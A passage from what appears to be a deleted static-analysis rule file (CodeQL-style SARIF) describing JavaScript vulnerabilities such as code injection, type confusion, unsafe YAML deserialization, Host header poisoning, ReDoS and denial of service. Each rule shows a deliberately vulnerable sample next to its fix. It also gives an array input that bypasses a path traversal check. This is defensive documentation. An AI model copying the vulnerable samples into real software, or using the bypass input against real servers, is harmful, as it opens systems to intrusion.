'\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Escaping code as HTML does not provide protection against code injection.", - "id" : "js/bad-code-sanitization", - "kind" : "path-problem", - "name" : "Improper code sanitization", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/type-confusion-through-parameter-tampering", - "name" : "js/type-confusion-through-parameter-tampering", - "shortDescription" : { - "text" : "Type confusion through parameter tampering" - }, - "fullDescription" : { - "text" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n", - "markdown" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-843" ], - "description" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type.", - "id" : "js/type-confusion-through-parameter-tampering", - "kind" : "path-problem", - "name" : "Type confusion through parameter tampering", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.8" - } - }, { - "id" : "js/unsafe-deserialization", - "name" : "js/unsafe-deserialization", - "shortDescription" : { - "text" : "Deserialization of user-controlled data" - }, - "fullDescription" : { - "text" : "Deserializing user-controlled data may allow attackers to execute arbitrary code." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n", - "markdown" : "# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-502" ], - "description" : "Deserializing user-controlled data may allow attackers to\n execute arbitrary code.", - "id" : "js/unsafe-deserialization", - "kind" : "path-problem", - "name" : "Deserialization of user-controlled data", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "9.8" - } - }, { - "id" : "js/host-header-forgery-in-email-generation", - "name" : "js/host-header-forgery-in-email-generation", - "shortDescription" : { - "text" : "Host header poisoning in email generation" - }, - "fullDescription" : { - "text" : "Using the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n", - "markdown" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-640" ], - "description" : "Using the HTTP Host header to construct a link in an email can facilitate phishing\n attacks and leak password reset tokens.", - "id" : "js/host-header-forgery-in-email-generation", - "kind" : "path-problem", - "name" : "Host header poisoning in email generation", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.8" - } - }, { - "id" : "js/regex-injection", - "name" : "js/regex-injection", - "shortDescription" : { - "text" : "Regular expression injection" - }, - "fullDescription" : { - "text" : "User input should not be used in regular expressions without first being escaped, otherwise a malicious user may be able to inject an expression that could require exponential time on certain inputs." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-730", "external/cwe/cwe-400" ], - "description" : "User input should not be used in regular expressions without first being escaped,\n otherwise a malicious user may be able to inject an expression that could require\n exponential time on certain inputs.", - "id" : "js/regex-injection", - "kind" : "path-problem", - "name" : "Regular expression injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/server-crash", - "name" : "js/server-crash", - "shortDescription" : { - "text" : "Server crash" - }, - "fullDescription" : { - "text" : "A server that can be forced to crash may be vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", - "markdown" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-248", "external/cwe/cwe-730" ], - "description" : "A server that can be forced to crash may be vulnerable to denial-of-service\n attacks.", - "id" : "js/server-crash", - "kind" : "path-problem", - "name" : "Server crash", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/missing-rate-limiting", - "name" : "js/missing-rate-limiting", - "shortDescription" : { - "text" : "Missing rate limiting" - }, - "fullDescription" : { - "text" : "An HTTP request handler that performs expensive operations without restricting the rate at which operations can be carried out is vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-770", "external/cwe/cwe-307", "external/cwe/cwe-400" ], - "description" : "An HTTP request handler that performs expensive operations without\n restricting the rate at which operations can be carried out is vulnerable\n to 